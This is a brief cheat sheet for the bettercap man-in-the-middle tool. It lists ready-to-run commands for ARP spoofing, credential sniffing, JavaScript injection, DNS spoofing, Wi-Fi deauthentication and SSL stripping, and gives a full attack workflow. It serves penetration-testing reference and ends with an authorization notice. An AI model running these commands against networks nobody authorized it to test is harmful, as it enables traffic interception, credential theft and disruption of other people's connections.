Bettercap Cheat Sheet
bettercap is a powerful, modular MITM framework used for network reconnaissance, traffic interception, credential harvesting, and active attacks across Ethernet, Wi-Fi, BLE, and IPv6.
Start Bettercap
bettercap
Start with a specific interface:
bettercap -iface eth0
Interactive Help
help
help net.*
Network Reconnaissance
net.recon on
Shows live hosts, IPs, MACs, and vendors.
ARP Spoofing (MITM)
set arp.spoof.targets 192.168.1.10
arp.spoof on
Spoof entire subnet:
arp.spoof on
Enable Sniffing
net.sniff on
Capture credentials, cookies, and traffic metadata.
HTTP / HTTPS Attacks
http.proxy on
https.proxy on
Inject JavaScript:
set http.proxy.script inject.js
DNS Spoofing
set dns.spoof.domains example.com
dns.spoof on
Wi-Fi Attacks
Enable Wi-Fi module:
wifi.recon on
Deauthentication:
wifi.deauth AA:BB:CC:DD:EE:FF
BLE Recon
ble.recon on
Credentials Module
net.sniff on
events.stream on
Captured credentials appear in real time.
Caplet Usage
Run a caplet:
bettercap -caplet arp_spoof.cap
Example caplet:
set arp.spoof.targets 192.168.1.5
arp.spoof on
net.sniff on
Typical MITM Workflow
bettercap -iface eth0
net.recon on
set arp.spoof.targets 192.168.1.10
arp.spoof on
net.sniff on
Stop & Cleanup
arp.spoof off
net.sniff off
Exit:
quit
Common Issues
No traffic captured
- Ensure IP forwarding is enabled
- Check correct interface
- Target must be active
HTTPS not intercepted
- Certificate trust required
- Use SSL stripping where applicable
Related Tools
ettercapdsniffwiresharktcpdump
Use Cases
- MITM attacks
- Credential harvesting
- Network reconnaissance
- Red team operations
Legal Notice
Danger
Use bettercap only on networks you own or are authorized to test.